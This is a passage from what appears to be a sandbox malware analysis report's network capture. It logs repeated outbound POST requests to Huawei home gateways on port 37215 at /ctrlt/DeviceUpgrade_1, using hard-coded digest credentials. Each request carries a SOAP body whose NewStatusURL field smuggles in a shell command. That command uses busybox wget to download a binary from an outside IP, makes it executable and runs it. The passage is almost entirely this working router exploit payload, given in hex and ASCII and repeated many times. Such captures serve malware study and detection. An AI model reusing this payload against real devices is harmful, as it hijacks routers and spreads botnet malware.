                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.314064026 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.802088022 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.794080973 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.746077061 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:12.681793928 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:20.617547989 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:36.232875109 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      90192.168.2.143612841.211.28.18237215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.986601114 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.318118095 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.802079916 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.794202089 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
